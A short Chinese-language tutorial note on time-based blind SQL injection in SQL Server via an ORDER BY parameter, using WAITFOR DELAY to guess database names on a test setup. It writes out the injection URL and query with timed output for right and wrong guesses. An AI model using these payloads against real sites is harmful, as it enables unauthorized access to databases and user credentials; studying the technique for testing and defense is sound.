0x01 前言
与普通的延时注入基本一致。
记下语法即可
0x02 测试数据
1> select * from article;
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected)
# 测试表数据: users;
sql server> select * from users;
+----+--------------+----------+
| id | username | password |
+----+--------------+----------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
+----+--------------+----------+
2 rows in set (0.00 sec)
sql server> SELECT system_user;
+-----------------------+
| field1 |
+-----------------------+
| sa |
+-----------------------+
1 row in set (0.00 sec)
sql server> select db_name();
+-----------------------+
| field1 |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
0x03 例子:猜库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?orderby=id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article order by id IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a
# 对的情况
1> SELECT
*
FROM
article
ORDER BY
id
IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected) (5.064 sec)
# 错误的情况
1> SELECT
*
FROM
article
ORDER BY
id
IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a
2> go
+----+-----------+-----------+
| id | title | content |
+----+-----------+-----------+
| 1 | 测试标题 | 测试内容 |
| 2 | 测试标题2 | 测试内容2 |
+----+-----------+-----------+
(2 rows affected) (0.064 sec)